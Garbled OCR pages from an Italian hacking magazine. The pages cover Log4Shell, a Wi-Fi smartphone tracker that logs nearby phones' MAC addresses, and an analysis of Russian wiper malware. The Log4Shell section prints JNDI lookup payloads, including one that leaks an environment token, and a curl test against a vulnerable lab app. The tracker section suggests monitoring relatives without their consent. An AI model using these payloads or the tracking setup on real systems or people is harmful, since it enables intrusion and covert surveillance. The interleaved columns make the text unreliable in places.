Ticket, Pass-the-Hash, Token Forging, etc…
scrivete in redazione se volete saperne di più.
RACCOLTA
PDF
HACKER
JOURNAL
Acquista la raccolta
PDF digitale del 2021
9 numeri a soli 7,90 €
anziché 35,10 € vai su
www.hackerjournal.it/raccoltapdf2021
17
 HACKTUALITÀ

GLOSSARIO
DI BASE
Una r e v e r s e

s
g
ESCAPE

l d a i l o
Per sequenza

sh e l
di escape si intende

ew
una serie di caratteri
che si utilizza, in una
stringa di testo, per far
capire all’interprete
Sh el l co ns en te a ch iunque di prendere
che quello che si sta
Il bug Log4 ina su cui è presente
scrivendo va inteso
nt ro ll o di un a m ac ch
il co
un applicativo Java
in senso letterale e non
_n
come un simbolo

N
speciale. Per esempio,
di solito \n indica un
ell’arco degli ultimi anni (DON’T) LOOKUP
invio a capo: se si
desidera che venga abbiamo assistito a una serie L’errore di fondo è in realtà molto
interpretato in senso di bug “famosi”, che hanno comune: la mancata validazione
lia

letterale, bisogna avuto un certo risalto anche dell’input dell’utente. Il problema, in

scrivere \\n, usando sulla stampa generalista e ai quali è stato questo caso, è dato da una caratteristica
quindi il simbolo assegnato un nome. Qualcuno ancora di Log4J: i lookup. Essi sono un
\ come carattere
si ricorda di Heartbleed o di Shellshock, meccanismo usato per sostituire parti di
di escape.
che hanno causato molta preoccupazione testo dentro le stringhe da loggare, e
ita

VARIABILI all’epoca della loro scoperta. Ma sono funzionano con il simbolo dollaro e le
D’AMBIENTE tutto sommato vulnerabilità facili da parentesi graffe. Per esempio, la stringa:
Le variabili d’ambiente contenere e correggere, ancora presenti
sono delle variabili
su alcuni sistemi non aggiornabili ma ${java:os}
gestite a livello
che difficilmente potrebbero essere
@

di sistema operativo,
tipicamente dalla shell, sfruttati da qualche malintenzionato viene sostituita con le informazioni sul
che possono cambiare grazie a una ridotta diffusione e a sistema operativo. Se come riga di log
a seconda del contesto strumenti di protezione come i firewall. scrivessimo:
in cui ci si trova Un bug di cui invece tutti ci ricorderemo
e sono accessibili
a lungo è Log4Shell, a causa della sua Host: ${java:os}; Tutto bene
dall’applicazione.
Vengono utilizzate diffusione e persistenza. In effetti, il
proprio per permettere software vulnerabile (Log4J) è un tool nel log otterremmo il testo:
all’applicazione gestito dalla Apache Foundation che è
di capire “dove” si molto diffuso: già soltanto i progetti della Host: Windows 10 10.0,
trova e quindi adattarsi stessa fondazione sono in buona parte architecture: amd64-64; Tutto bene
di conseguenza
basati su Java e su questa libreria.
(per esempio, capire
se stia girando su Inoltre, le vulnerabilità scoperte sono Chiaramente, questo è stato fatto
Windows o UNIX). diverse, tanto che riuscire a correggerle per comodità: è utile avere nei log
tutte ha richiesto più tempo del previsto. informazioni sull’ambiente, per capire

18
 VULNERABILITÀ
Una delle tante app
vulnerabili è Minecraft.

Siccome Log4J non verifica

il contenuto delle stringhe loggate,
finirebbe per inseguire il lookup
e andare a scaricare il file “exploit”.
Ma non finisce qui: se il file in
questione contiene codice Java
valido, questo verrà eseguito
figura #1

s
automaticamente. Si ottiene,
quindi, una ovvia esecuzione
subito come replicare la situazione raggiungere oggetti e file remoti. remota di codice semplicemente

che ha dato origine all’errore, e
questo meccanismo permette di
ottenere l’informazione senza
doverci pensare troppo. Per
questo motivo si può fare accesso
anche alle variabili d’ambiente:
_n
${env:USERNAME}
In effetti anche queste potrebbero
essere informazioni sensibili, si sa
lia
ew
Se un malintenzionato possiede
un server LDAP in cui pubblicare
un payload, può raggiungerlo così:
ldap://127.0.0.1:8080/exploit
La vulnerabilità nasce dal fatto che
i percorsi JNDI possono essere
inseguiti da un lookup e un
malintenzionato potrebbe scrivere
un testo di questo tipo:
fornendo del testo a
un’applicazione, tra l’altro con una
stringa estremamente semplice.
ENTITÀ DELLA VULNERABILITÀ
Per capire la pericolosità di questo
bug bisogna considerare un
dettaglio: non tutte le applicazioni
Java basate su Log4J sono
automaticamente vulnerabili, solo
quelle che loggano direttamente

che a volte vengono memorizzate ${jndi:ldap://127.0.0.1:8080/ input dell’utente senza

delle password tra le variabili exploit}. preoccuparsi di sanificarlo con le
d’ambiente. Un malintenzionato
potrebbe inviare all’applicazione
(per esempio delle API Web) una Applicazione cavia
ita

stringa da loggare come: Si può testare una semplice applicazione vulnerabile d’esempio tramite
un’immagine docker appositamente realizzata:
User-Agent ${env:TEMPORARY_
SESSION_TOKEN} docker run -p 8080:8080 ghcr.io/christophetd/log4shell-
vulnerable-app
@

Così Log4J scriverebbe il token

segreto sul disco, e in futuro
sarebbe possibile leggere il file
per recuperarlo. Però non è un
problema così grave: in genere
i log rimangono sulla macchina,
quindi le informazioni non
dovrebbero trapelare facilmente,
non è semplice recuperare il file di
log. Il vero problema è un altro:
Java Naming and Directory
Interface, anche abbreviato JNDI.
È il meccanismo standard di Java
per scrivere degli URL con cui
Questa applicazione logga tramite Log4J tutte le intestazioni delle richieste
HTTP che le arrivano, quindi si può provare in questo modo:
curl 127.0.0.1:8080 -H ‘X-Api-Version:
${jndi:ldap://127.0.0.1/a}’
Appena la riga viene loggata, la Virtual Machine Java cercherà di caricare
il codice presente nel server LDAP su localhost (che per fortuna non esiste).
Controllando l’output dell’applicazione si noterà l’errore:
Connection refused
perché ovviamente non c’è un server LDAP in ascolto. Se si sostituisse
quel percorso con uno realmente esistente, il codice Java caricato
sul server LDAP verrebbe eseguito.

19
 HACKTUALITÀ
GLOSSARIO
corrette sequenze di escape per i simboli ovviamente, che quelle persone siano
speciali. Possiamo quindi dire che il vero sufficientemente esperte da non lasciar
DI BASE
problema di fondo sta nel fidarsi troppo infettare il proprio PC da qualche
LDAP delle librerie esistenti, senza prendere malware che potrebbe scansionare la
Si tratta di un precauzioni. A ogni modo, considerando rete alla ricerca di server vulnerabili. Del
protocollo per l’effettivo numero di applicazioni resto fare una scansione di questo tipo
l’accesso a directory vulnerabili, è chiaro che in tanti si siano su macchine pubbliche è estremamente
remote: permette
fidati di Log4J. Un grosso problema facile per un malintenzionato: basta
di condividere
credenziali, rubriche, è rappresentato dai vari progetti della connettersi a un server e inviare questa
o anche file. fondazione Apache, che ormai da anni stringa, se il target è predisposto per
Approssimando, colleziona progetti basati su Java, i quali loggare le varie richieste che arrivano

s
è sostanzialmente sono estremamente diffusi su desktop l’attacco avrà automaticamente
un database leggero, e server di tutto il mondo. In linea di successo. E se l’attacco ha successo, il
quindi è possibile
massima si possono poi considerare criminale può fare tutto ciò che vuole,

ew
usarlo per fornire
in modo sicuro relativamente sicuri software che non perché può facilmente ottenere un
qualsiasi tipo sono aperti al pubblico, ma magari terminale remoto ed entrare nella
di dato possa risultano disponibili a un numero macchina con i privilegi dell’utente che
essere strutturato. ristretto di persone (per esempio eseguiva l’applicazione Java (che spesso
solo in una rete locale). A condizione, ma non sempre, per fortuna, è root).
_n
figura #2
lia

Appena l’app
segue
il lookup
malevolo, il
ita

pirata ottiene
una reverse
shell sul
sistema
vittima.
@

La soluzione
Correggere il bug è un’operazione piuttosto
complessa: sono state apportate delle modifiche alle
versioni vulnerabili di Log4J (fino alla 2.16), rilasciando
la 2.17. Ma, proprio mentre scriviamo, si è scoperto
che anche nella nuova 2.17 è presente una
vulnerabilità, e si attende a breve il rilascio di
un’ulteriore patch, sperando che sia definitiva. A quel
punto, gli sviluppatori di tutte le app che dipendono
da Log4J dovranno aggiornare le proprie dipendenze
e rilasciare una nuova versione dell’applicazione.
E poi chi amministra i sistemi dovrà installare le nuove
versioni sui propri server e desktop. Una strada
potenzialmente percorribile da subito può essere il
rollback alla versione 1 di Log4J, che non è vulnerabile,
ma questo potrebbe comportare modifiche più
impegnative sulle app e non è detto che si risparmi
davvero del tempo. Oltretutto, c’è l’ovvio problema
che alcune applicazioni, semplicemente, non potranno
essere aggiornate: applicazioni ormai non più
mantenute, oppure installate in sistemi complessi che
non possono facilmente essere aggiornati. Pensiamo
a software medicali, spesso progettati per sistemi
operativi molto vecchi e mai aggiornati perché le loro
licenze costano troppo per le tasche degli utilizzatori.
Questa vulnerabilità è qualcosa con cui dovremo,
probabilmente, fare i conti per molto tempo.

20
 s
ew
_n
lia

SICUREZZA
ita

Sorveglianza Wi-Fi
@

Monitorati e schedati
Seconda parte del progetto di creazione di un tracciatore per smartphone ............... 22

wiper Nuovi malware da cyberguerra

Analisi dettagliata dei tool distruttivi usati dalla Russia per attaccare l’Ucraina......... 26

2fa La doppia autenticazione e bacata

Un attacco che sta colpendo molti utenti in Rete e che causa danni gravi.................. 34

pentesting Attacco a dizionario!

Progettiamo un dictionary attack calibrato su una Web application reale!.................. 36
 SICUREZZA

MON I T O R AT I

s
E SCH E D A T I !
ew Seconda parte
_n
o il p ro g e tt o ch e ci porterà ad avere
Terminiam p ersonalizzabile
re d i sm a rt p h o n e
un tracciato d ic e sc ri tt o in C e in BASH
o’ d i co
usando un SoC e un p
lia

N
ello scorso numero LO SCRIPT BASE la parte di scansione
abbiamo iniziato Ripartiamo dallo script presente modificando il file /etc/rc.local:
un progetto che, all’URL https://pastebin. agendo da root, apritelo con il
ita

sfruttando il Wi-Fi, com/0B7Gpjnt. In fondo a questo vostro editor di testi preferito

ha lo scopo di individuare
la posizione dei cellulari dei
clienti all’interno di un negozio.
In queste pagine concludiamo
@
codice ci sono degli script, come e aggiungete prima della scritta
sposta_e_controlla_dati.sh exit 0 il comando
e altri quattro, che si occupano
di formattare i dati; li potete

./scansiona.sh wlan0 120 &

tale progetto. Se vi siete persi scaricare da qui: https://bit.
la prima parte, potete acquistare ly/3JSMwAZ. A ogni modo, anche In questo modo il comando
l’arretrato del numero 261 senza di essi lo script Bash andrà in esecuzione a ogni
di HJ dall’URL https://sprea.it/ è in grado di collezionare i dati, riavvio, automatizzando le
riviste/139, in formato cartaceo per cui potrete elaborarli come operazioni. Leggendo il file Bash,
oppure in digitale. meglio vi aggrada. Concludiamo vi accorgerete che i dati vengono
salvati in RAM e poi spostati
Anche i moderni display pubblicitari sulla microSD una volta ogni ora.
Questa scelta è frutto di un
sono in grado di tracciare gli compromesso: da una parte,
smartphone, oltre che acquisire il desiderio di non “bruciare” la
microSD con eccessive scritture
alcuni dati biometrici come età (una ogni due minuti, cioè 30
e sesso di chi passa loro davanti all’ora) e dall’altra la giusta

22

necessità di preservare in dati
in caso di uno spegnimento non
pianificato della scheda ARM.
Lo svantaggio è che, in caso di
spegnimento non programmato,
potreste perdere fino a 29
registrazioni, un danno
considerato tutto sommato
accettabile in fase di
pianificazione delle specifiche
di progetto. Dato che potrete
accedere ai sorgenti, sarà un
gioco da ragazzi individuare
e modificare il parametro “59”
(che indica il tempo in minuti che
deve trascorrere tra un backup
su microSD e il successivo),
alzandolo o abbassandolo a
seconda delle vostre necessità.
_n
Scaricate i sorgenti dai link
indicati prima e spostateli nella
directory /root che sarà la vostra
directory di lavoro: i vari file
nome.c andranno compilati con
lia
gcc nome.c -o nome
in quanto verranno eseguiti
all’interno degli script Bash che
ita
saranno a loro volta richiamati
dallo script scansiona.sh che
abbiamo visto nella puntata
precedente. Abbiate l’accortezza
di rendere eseguibili i file Bash
@
con il comando
chmod +x *.sh
STRUTTURA MODULARE
Bene, abbiamo raccolto i dati,
ma ora la domanda è: “cosa ce
ne facciamo?”. Risposta: “quello
che più ci aggrada!”. Nel nostro
caso, abbiamo deciso di limitarci
a registrare, nella singola
giornata, per quanto tempo le
periferiche “bersaglio” si trovano
nel raggio d’azione del nostro
SORVEGLIANZA WI-FI
registratore, segnandoci inoltre
ora e minuti di quando sono
state rilevate la prima e l’ultima
volta nell’arco della giornata.
A cosa serve un sistema del
genere? Per esempio, potrebbe
essere usato per controllare
se e per quanto tempo nostra
suocera è rimasta a casa nostra
mentre noi eravamo via, o per
monitorare quanto tempo nostro
figlio è stato attaccato a YouTube
durante le ore dedicate allo
ew
studio… Insomma, lo strumento
c’è, sta alla fantasia di ognuno
immaginare come meglio
utilizzarlo. Nei file scaricabili
osserverete che ci sono tre script
Bash che lanciano a loro volta tre
eseguibili e, successivamente, un
eseguibile finale di “conclusione”.
Anche se a una prima occhiata
potrebbe apparire un metodo
confusionario e complesso,
questo sistema ci permette
di isolare i quattro passi logici:
• generazione degli indici
di lavoro;
• generazione dei dati
mensili globali;
I dati rilevati su base giornaliera: i link permettono
di accedere ai dati dei mesi precedenti, qualora presenti.
• generazione dei dati annuali
singoli per ogni periferica
monitorata;
• generazione dei dati mensili
accorpati su base annua.
Questo metodo apparentemente
“frammentato” è in realtà
il migliore ed è alla base
della filosofia che ha fatto
grandi i sistemi UNIX, cioè
s
la metodologia KISS (Keep it
simple, stupid!). In altre parole,
spezzare un’attività complessa
in sotto attività più semplici: ogni
programma deve fare una cosa
sola e nel migliore dei modi.
I vantaggi principali sono che:
• due programmi “corti” sono
manutenibili e ottimizzabili
con maggior facilità rispetto
a un unico programma “lungo”
che racchiude quelle due
funzioni svolte dai due
programmi “corti”;
• la modularità del software
facilita l’aggiunta di nuove
funzioni scrivendo un
programmino in più
e senza andare a disturbare
i programmi già fatti.
figura #1
23
 SICUREZZA
figura #2
_n
lia
I link ipertestuali della
pagina mensile
permettono di accedere
ita
ai dati aggregati su base
annua della singola
periferica intercettata.
DA BASH A C
@
Per quanto ci riguarda, abbiamo
proceduto scrivendo la prima
versione del software in Bash,
per una veloce realizzazione
e verifica. Poi, una volta che
la funzione svolta è risultata
corretta, abbiamo tradotto
il software in C per ottimizzare
le prestazioni, dato che abbiamo
riscontrato che i tempi
di elaborazione crescevano
esponenzialmente al crescere
dei dati da elaborare. Per
stressare il software abbiamo
24
generato volutamente
un’eccessiva massa di dati
da elaborare e le due versioni
– Bash e C – necessitavano
rispettivamente di 143 minuti
e di 12 secondi per completare
l’elaborazione. Siccome la
velocità di generazione dei dati
finali era un imperativo, pena
l’inutilità della visualizzazione
dinamica dei dati, il passaggio
al C si è dimostrato obbligato.
Nei sorgenti C abbiamo
ew
comunque mantenuto alcune
istruzioni Bash perché abbiamo
riscontrato che rifarle
direttamente in C non apportava
benefici in termini di velocità
a fronte di un’inutile
complicazione del codice.
I programmi che generano
i risultati visibili provvedono
a realizzarne due versioni: in
formato txt e in formato HTML.
In questo modo è garantita la
flessibilità di fruizione: potrete
sia acquisire i dati come testo in
un foglio elettronico, sia vederli
direttamente tramite una pagina
Web, per un’immediata
comprensione della situazione.
Inoltre le pagine sono collegate
le une alle altre tramite link
ipertestuali, in modo che
l’utente possa scorrere
all’interno dei vari blocchi
di informazione. La scelta
dell’HTML puro può sembrare
desueta e rimanda con la
memoria all’era del “Web 1.0”,
ma ancora una volta ricordiamo
la filosofia KISS: delle pagine
HTML statiche sono la cosa più
veloce da erogare da parte di un
server Web e, inoltre, l’assenza
di database facilita la
manutenzione del server per
il semplice fatto che “quello che
non c’è, non si può rompere”.
Per recuperare i file HTML
necessari (con le istruzioni),
visitate https://bit.ly/3DqxHTW.
LA GESTIONE WEB
I file che avete scaricato
si occupano di rendere fruibili
i dati via Web: questi file
andranno spostati nella
s
directory /var/www/html.
I dati sono generati e posizionati
in RAM per non usurare la
microSD, ragion per cui occorre
creare il link simbolico tramite
i comandi:
cd /var/www/html
ln -s /dev/shm dati
Come impostato nella puntata
precedente, l’apparato ha
indirizzo di rete 192.168.1.210,
per cui dal client puntate
il vostro browser a tale indirizzo
e vi troverete di fronte a uno
scarno ma essenziale menu.
La voce “aiuto” vi fornirà delle
sommarie istruzioni, la voce
“scarica dati” vi permetterà
di recuperare un file Zip
contenente tutti i dati registrati.
Infine, la voce centrale “mensile”
vi permetterà di accedere ai dati
consultabili a video. Se avrete
registrato più di un mese,
il sistema vi proporrà
automaticamente dei link per
scorrere avanti e indietro lungo
i mesi. Inoltre ogni MAC Address
è a sua volta un link ipertestuale
che vi permetterà di accedere
al dettaglio, raggruppato su
base annuale, del singolo nodo
registrato. I dati scaricati
contengono sia la versione
HTML che quella TXT, per cui
non avrete problemi a elaborarli

IL GRANDE FRATELLO È REALTÀ
Il film 1984 rappresenta una realtà distopica nella
quale ogni cittadino viene spiato dal proprio governo
dittatoriale… Beh, benvenuti nel terzo millennio!
La Cina usa massivamente telecamere per tracciare
i propri cittadini che vengono riconosciuti tramite
identificazione facciale grazie ad algoritmi che
assegnano a ogni persona un ‘punteggio sociale’
in base a come egli si comporta. Scendendo nella
SORVEGLIANZA WI-FI
ecc. Qui trovate i dati: https://en.wikipedia.org/wiki/
Mass_surveillance_in_China. Ma nel “democratico”
Occidente? Beh, anche peggio. Gli Stati Uniti hanno
cominciato, fin dal 1955, non solo a ficcanasare negli
affari dei propri cittadini, ma anche in quelli del resto
del mondo grazie al programma Echelon.
https://en.wikipedia.org/wiki/Mass_surveillance_in_

s
graduatoria, man mano la persona viene privata di the_United_States
diritti come prendere mezzi pubblici, avere la patente, https://en.wikipedia.org/wiki/ECHELON

tramite programmi C/Bash
o a importarli nel vostro foglio
elettronico preferito per
ulteriori elaborazioni.
_n
COME ESPANDERE
IL SOFTWARE
Con poco sforzo potete quindi
raccogliere molti dati grezzi;
lia
ew
portati al sito https://dnschecker.
org: inserendo l’indirizzo MAC
del nostro cellulare siamo riusciti
a ricavare interessanti dettagli.
In poche parole, i primi 3 byte,
nel nostro caso 20:64:32,
lo identificano immancabilmente
come un Samsung. E siccome le
ultime tre cifre sono un numero
identificare il modello, oltre che
la marca! Ci preme far presente
che non stiamo violando
nessuna norma: questi database
sono su Internet, liberamente
accessibili e scaricabili in formato
testo. Una volta acquisiti,
potreste modificare il software
per aggiungere un campo

il modo in cui “macinarli” per
ricavarne le informazioni che vi
interessano è solo una questione
di scelta. Invitiamo alla lettura
della pagina man dei vari
ita
progressivo che va da 00:00:00
a FF:FF:FF, più è piccolo tale
numero e più vecchio risulta
essere il cellulare: con un po’ di
pratica e incrociando abbastanza
indicante marca e modello
del cellulare “sniffato”… ma non
vogliamo farvi penare troppo
e vi passiamo direttamente il link
http://standards-oui.ieee.org/

programmi della suite aircrack- dati, si può addirittura oui/oui.txt.

ng (airodump-ng in particolare)
perché il vostro cellulare è un
chiacchierone e airodump-ng è
pronto a registrare ogni dettaglio
figura #3
@

che, seppur apparentemente

insignificante, potrebbe dire
molto a un agguerrito
“curiosone” dell’etere.
Per esempio, sapete che i MAC
Address sono rilasciati “a blocchi”
da un ente preposto a tutte le
industrie che ne fanno richiesta?
Per saperne di più della logica
alla base dei MAC Address,
consultate la pagina https://it.
wikipedia.org/wiki/Indirizzo_
MAC. Una rapida ricerca per Niente di più facile: un click su “Scarica dati” e recuperiamo
“mac address lookup” ci ha il file compresso contenente tutti i dati accumulati!

25
 SICUREZZA

s
ew
_n
NUOVI MALWARE
lia

da cyberguerra
ita

Analisi dettagliata dei tool distruttivi utilizzati dalla Russia

per attaccare l’Ucraina e comprometterne le infrastrutture

L
@

a guerra della Russia
contro l’Ucraina passerà
tristemente alla storia
anche per l’utilizzo
di modalità di cyberwarfare
che hanno visto l’impiego di
malware distruttivi prima ancora
della fase di invasione vera e
propria avvenuta il 24 febbraio
2022 e che sono poi continuati
(con diverse varianti) durante le
successive settimane di assedio.
Al momento in cui scriviamo
sono quattro i malware
principalmente utilizzati I primi due sono stati diffusi nei
dalla Russia per distruggere mesi precedenti all’invasione,
le infrastrutture ucraine: gli altri due a guerra cinetica
WhisperGate, già in corso. In queste pagine
FoxBlade/SonicVote, cercheremo di ricostruire quello
Laisanraw e CaddyWiper. che è successo in questi mesi.
Il centro protezione Microsoft (MSTIC)
ha scoperto a Gennaio il malware
WhisperGate per Windows.
Per dettagli visitate il sito
bit.ly/malwaretargetingukrainian

26

WHISPERGATE: UN MESE
PRIMA DELL’INVASIONE
WhisperGate è un
malware wiper
per Windows
che agisce
generalmente
in due fasi. Nella
prima fase un bootloader, spesso
nominato stage1.exe (che risiede
in varie directory, tra le quali
C:\PerfLogs, C:\ProgramData,
C:\ e C:\temp), sovrascrive il
Master Boot Record (MBR) del
sistema vittima con una falsa
richiesta di riscatto [figura #1].
Il riscatto è soltanto un diversivo
(il suo pagamento non aiuta
infatti a recuperare i dati persi)
_n
e lo spegnimento del sistema
infetto distrugge definitivamente
l’host eseguendo il malware che
danneggia i file in esso archiviati.
Nella seconda fase un
lia
downloader (denominato stage2.
exe) scarica il malware dannoso
da un canale Discord, tramite
un link codificato nel downloader
stesso, e lo esegue in memoria.
ita
I FILE PRESI DI MIRA
Il wiper corrompe così tutti i file
che hanno determinate estensioni
(immagini, archivi compressi,
@
La falsa richiesta di riscatto di WhisperGate.
Fonte: CrowdStrike
documenti, database ecc.), e che
sono memorizzati in specifiche
directory, sovrascrivendoli con
byte 0xCC (per una dimensione
totale del file di 1 MB) [figura #2].
Danneggiati i file, il malware
li rinomina con un’estensione di
4 byte apparentemente casuale.
Una delle sue particolarità è che il
bootloader accede al disco tramite
BIOS interrupt 13H in modalità
LBA e sovrascrive ogni 199esimo
settore fino al raggiungimento
ew
della fine del disco. Danneggiato
il disco, il malware passa a
sovrascrivere il disco successivo
presente nell’elenco delle unità
rilevate. È bene precisare che
l’analisi di questo malware è
ancora in corso e al momento in
cui scriviamo non sono disponibili
tool di decrittaggio/recupero dati.
SONICVOTE E FOXBLADE:
POCHI GIORNI PRIMA
DELL’ATTACCO
Per gli esperti,
SonicVote (alias
HermeticRansom)
è un ransomware
scritto in Go
(versione 1.10.1)
utilizzato per distogliere
l’attenzione dall’attacco di
figura #1
Elenco delle estensioni dei file danneggiate da wiper di
WIPER
HermeticWiper, a causa del suo
stile non sofisticato e della scarsa
implementazione, e come payload
aggiuntivo per aumentare
l’efficacia di quest’ultimo.
Dall’analisi di HermeticRansom
risulta infatti che non è stato
usato alcun tipo di offuscamento
e che le sue semplici
funzionalità, nonché il metodo
s
di cifratura particolarmente
inefficace, suggeriscano sia stato
creato in un breve lasso di
tempo. Dopo l’esecuzione,
HermeticRansom crea un ID che
viene utilizzato come chiave.
Quindi identifica i dischi presenti
sul sistema infetto e raccoglie
un elenco di directory e file,
escluse le cartelle Windows
e Programmi. Successivamente
crea il file read_me.html nella
cartella Desktop dell’utente,
che contiene l’ID della vittima
e gli indirizzi di posta elettronica
sul dominio ProtonMail
per contattare l’aggressore.
L’inefficacia del flusso di lavoro
della crittografia di questo
malware consiste nel fatto che
per ogni file crittografato crea
delle copie del sample iniziale
e le esegue come processi
separati [figura#3].
figura #2
WhisperGate. Fonte: Microsoft
27
 SICUREZZA
figura #3 FOXBLADE: IL MALWARE
CHE DISTRUGGE L’MBR
FoxBlade (alias HermeticWiper)
è invece un malware che
distrugge il Master Boot Record
(MBR) e cancella i dati archiviati
nei dischi del sistema vittima.
Uno dei tanti nomi che sono
stati attribuiti a questo wiper
deriva dal fatto che il suo
L’inefficacia di HermeticRansom consiste nel fatto che ogni volta

s
eseguibile è stato firmato
che cripta un file crea una sua copia nella directory corrente.
Fonte Kaspersky: https:// securelist.com/ utilizzando un certificato digitale
elections-goransom-and-hermeticwiper-attack/105960/ valido rilasciato a “Hermetica

ALGORITMO DI
CRITTOGRAFIA UTILIZZATO
I file vengono crittografati
utilizzando l’algoritmo AES
_n
in modalità Galois/Counter
(GCM). La chiave AES a 32 byte,
generata tramite una funzione
del pacchetto Go, viene poi
crittografata con RSA-OAEP
lia
ew
e probabilmente da un hacker
non esperto in GoLang), ogni
volta che il binario e i suoi
cloni vengono eseguiti, viene
generata sempre la stessa
chiave AES. Tutti i file
crittografati sull’host usano
quindi la medesima chiave di
cifratura e la sua conoscenza
Digital Ltd”, una piccola azienda
videoludica di Cipro ignara,
però, del furto d’identità [figura
#5]. Il periodo di inattività di
questo malware (dall’infezione
all’esecuzione del payload)
può essere configurato da riga
di comando tramite due
parametri facoltativi. Se nulla
viene specificato, le impostazioni
di default sono di 20 minuti

(https://bit.ly/hj_OAEP) consente pertanto di decrittare per dare inizio alla distruzione

utilizzando una chiave pubblica
RSA che è hardcoded come
blob base64 (quindi facilmente
decrittabile). A ogni file
ita
i file. In merito alle soluzioni del sistema e di 35 minuti per
disponibili per la decrittografia il riavvio dell’host. Una volta
dei dati compromessi da eseguito, utilizzando le API di
HermeticRansom rimandiamo Windows il malware si concede

crittografato, HermeticRansom allo specifico box i privilegi necessari per

aggiunge l'estensione di approfondimento. compiere le sue azioni agendo
.encryptedJB e l’indirizzo email
[vote2024forjb@protonmail[.]
com] subito dopo il nome figura #4
@

originale del file. Considerato

La nota creata da
l'alto contenuto politico
HermeticRansom contiene
rilevato nel codice del malware costrutti grammaticali che
(strutture e metodi fanno suggeriscono sia stata scritta da
riferimento alle elezioni chi non ha un inglese fluente o
presidenziali statunitensi), che possa non essere stata
si presume che la sigla "JB" revisionata per mancanza di
tempo. Da notare i riferimenti alle
stia a indicare il presidente
elezioni americane, di cui l’intero
USA, Joseph Biden. binario è pieno zeppo. Fonte
A causa di un ulteriore errore CrowdStrike: https://www.
di implementazione (che crowdstrike.com/blog/
conferma l’ipotesi che how-to-decrypt-the-partyticket-
il malware sia stato scritto ransomware-targeting-ukraine/
in breve tempo [figura #4]

28

su SeShutdownPrivilege (che
fornisce la possibilità di
arrestare un sistema locale),
SeBackupPrivilege (che offre
il controllo dell'accesso
in lettura a qualsiasi file)
e SeLoadDriverPrivilege (che
dà la possibilità di caricare e
scaricare un driver di periferica).
UN SAMPLE
DI HERMETICWIPER
Ha tipicamente una dimensione
di 114 KB, di cui circa il 70%
è composto da risorse. Tra
le risorse binarie del malware
sono infatti presenti dei driver
di gestione delle partizioni
a 32 e 64 bit, compressi con
_n
l'algoritmo Lempel-Ziv e firmati
da un certificato legittimo
rilasciato alla software house
EaseUS. Si tratta quindi di un
abuso del driver legittimo
lia
empntdrv.sys (EaseUS Partition
Master NT Driver), che fa parte
del software EaseUs Partition
Master [figura #6]. In base alla
versione di Windows infettata,
ita
il malware estrae il driver
corrispondente e lo scrive nella
cartella C:\Windows\System32\
drivers rinominandolo con un
nome composto da 4 caratteri
@
generato in modo pseudo-
casuale utilizzando l’ID processo
del wiper. Questo file viene poi
decompresso con LZCopy
in un nuovo file con estensione
.sys (per esempio bpdr.sys).
Prima di caricare il driver, però,
il malware disabilita il dump
di arresto anomalo di Windows
modificando la chiave di registro
HKLM\SYSTEM\
CurrentControlSet\Control\
CrashControl\
CrashDumpEnabled
figura #5
ew
La firma digitale di HermeticWiper.
Fonte IBM: https://
securityintelligence.com/posts/
new-destructive-malware-cyber-
attacks-ukraine
sul valore 0. Per caricare il
driver, il malware crea un nuovo
servizio utilizzando le API e lo
richiama in un ciclo di cinque
volte consecutive per garantirne
il caricamento. Fatto ciò,
il servizio viene rimosso
eliminando l'intera chiave
del registro di sistema.
Caricato il driver, il malware
disabilita il servizio di Copia
Shadow del Volume (VSS)
di Windows per impedire
l’uso delle copie di backup
necessarie al ripristino del
sistema. Successivamente crea
Le risorse di HermeticWiper contengono i driver a 32 e 64 bit
di EaseUS Partition Manager per Windows XP e per Windows 7
e superiori. Fonte SentinelLabs: https://www.sentinelone.com/labs/
hermetic-wiper-ukraine-under-attack/
WIPER
una serie di thread aggiuntivi che
si occupano di gestire il riavvio
del sistema e di nascondere le
tracce del malware disabilitando
le funzionalità dell’interfaccia
che potrebbero allertare l’utente
sulla presenza di attività sospette
(per disabilitare i colori per i file
NTFS compressi e crittografati
imposta la chiave di registro
s
HKU\Software\Microsoft\
Windows\CurrentVersion\
Explorer\Advanced\
ShowCompColor sul valore 0,
mentre per disabilitare le
informazioni pop-up su cartelle
ed elementi del desktop imposta
a 0 la chiave HKU\Software\
Microsoft\Windows\
CurrentVersion\Explorer\
Advanced\ShowInfoTip). Infine,
il malware inizia la sua routine
distruttiva su ciascun disco fisico
rilevato sovrascrivendo i file,
distruggendo le tabelle delle
partizioni e corrompendo i primi
512 byte, ossia il Master Boot
Record (MBR).
HERMETICWIPER
DISTINGUE FAT O NTFS
Nel caso di una partizione FAT,
il malware chiama direttamente
le API di Windows necessarie ad
acquisire un provider di servizi
di crittografia (CSP) usato poi
figura #6
29
 SICUREZZA
COME RECUPERAR E I FILE IN CASO
ICRANSOM In alcuni scenari è emerso
DI ATTACCO HERMET che, oltre al diversivo creato da
HermeticRansom per coprire
Gli errori di implementazione di HermeticRansom nella generazione della le azioni del malware distruttivo
chiave AES, già discussi nel corso di questo articolo, rendono possibile HermeticWiper,
il recupero dei dati crittografati da questo ransomware. Ciò ha permesso
gli attacchi hanno sfruttato
ad alcune società di sicurezza di rilasciare dei tool di decrittazione.
CrowdStrike, ad esempio, ha caricato su GitHub (https://bit.ly/ anche un worm (ribattezzato
partyticketdecriptor) uno script in Go (testato con la versione 1.16.6 di HermeticWizard) utilizzato
Go) per decrittografare i file compromessi da HermeticRansom (che la per la propagazione
società ha ribattezzato “PartyTicket”). Può essere compilato come del malware sulla rete
eseguibile o eseguito da una shell aperta nella directory dello script con

s
locale compromessa.
il comando go run PartyDecrypt.go. Per decrittografare un file occorre
passarlo come argomento tramite il flag -p e l’output decrittografato verrà
LASAINRAW: IL MALWARE

ew
poi salvato nella stessa directory come decrypted.bin. Il suo vantaggio,
essendo scritto in Go, è che può essere eseguito su GNU/Linux, Windows DELL’ATTACCO
e Mac (https://bit.ly/goperwindows). Più user friendly è, invece, Lasainraw (alias
l’approccio usato da Avast, che ha rilasciato un tool di decrittografia IsaacWiper) è un
basato su una comoda procedura guidata, specifico per Windows
attacco malware
(https://bit.ly/decryptorhermeticransom). Il primo step chiede
di selezionare i file e le posizioni da scansionare (siano esse unità
distruttivo
apparso nella
_n
di rete o singole cartelle); le unità locali vengono invece rilevate
